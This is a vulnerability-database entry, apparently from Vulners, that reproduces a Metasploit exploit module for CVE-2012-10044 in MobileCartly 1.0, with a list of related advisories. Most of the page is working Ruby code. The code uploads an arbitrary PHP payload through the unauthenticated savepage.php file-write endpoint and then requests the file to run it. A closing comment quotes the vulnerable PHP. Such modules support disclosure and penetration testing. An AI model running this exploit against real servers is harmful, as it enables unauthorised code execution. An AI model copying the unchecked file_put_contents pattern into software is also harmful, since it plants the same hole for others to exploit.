Lucene search
+L

MobileCartly 1.0 Arbitrary File Creation Vulnerability

🗓️ 10 Aug 2012 00:00:00Reported by Yakir Wizman <[email protected]>, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

This module exploits a vulnerability in MobileCartly. The savepage.php file does not do any permission checks before using file_put_contents(), which allows any user to have direct control of that function to create files under the 'pages' directory by default, or anywhere else as long as the user has WRITE permission

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-10044
29 May 201815:50
circl
cnnvd
CNNVD
MobileCartly 安全漏洞
8 Aug 202500:00
cnnvd
cve
CVE
CVE-2012-10044
8 Aug 202518:11
cve
cvelist
Cvelist
CVE-2012-10044 MobileCartly 1.0 savepage.php Arbitrary File Creation
8 Aug 202518:11
cvelist
euvd
EUVD
EUVD-2012-6586
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-10044
8 Aug 202519:15
nvd
ptsecurity
Positive Technologies
PT-2025-32397 · Unknown · Mobilecartly
8 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2012-10044
10 Aug 202518:14
redhatcve
vulnrichment
Vulnrichment
CVE-2012-10044 MobileCartly 1.0 savepage.php Arbitrary File Creation
8 Aug 202518:11
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MobileCartly 1.0 Arbitrary File Creation Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in MobileCartly.  The savepage.php file
          does not do any permission checks before using file_put_contents(), which
          allows any user to have direct control of that function to create files
          under the 'pages' directory by default, or anywhere else as long as the user
          has WRITE permission.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Yakir Wizman <yakir.wizman[at]gmail.com>', # Original discovery
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2012-10044' ],
          [ 'OSVDB', '85509' ],
          [ 'EDB', '20422'],
          [ 'BID', '55399']
        ],
        'Payload' => {
          # Goes in the query string, needs to fit in 8k. Leave a little
          # exra for the other params and the path.
          'Space' => 8000,
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-08-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to MobileCartly', '/mobilecartly/'])
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    File.dirname("#{uri}.")

    res = send_request_raw({ 'uri' => normalize_uri(uri, '/index.php') })
    if res and res.body =~ /MobileCartly/
      return Exploit::CheckCode::Detected('The target service was detected')
    else
      return Exploit::CheckCode::Safe('The target is not vulnerable')
    end
  end

  def exploit
    #
    # Init target path
    #
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    base = File.dirname("#{uri}.")

    #
    # Configure payload names
    #
    php_fname = Rex::Text.rand_text_alpha(5) + '.php'

    #
    # Upload payload
    #
    print_status('Uploading payload')
    res = send_request_cgi({
      'uri' => normalize_uri(base, '/includes/savepage.php'),
      'vars_get' => {
        'savepage' => php_fname,
        'pagecontent' => get_write_exec_payload(unlink_self: true)
      }
    })

    if !res
      print_error('No response from server, will not continue.')
      return
    end

    #
    # Run payload
    #
    print_status("Requesting '#{php_fname}'")
    send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })

    handler
  end
end

=begin
*facepalm*

<?php
  $page = "../pages/" . $_REQUEST['savepage'];
  $content = $_REQUEST['pagecontent'];
  file_put_contents($page, $content);
?>
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation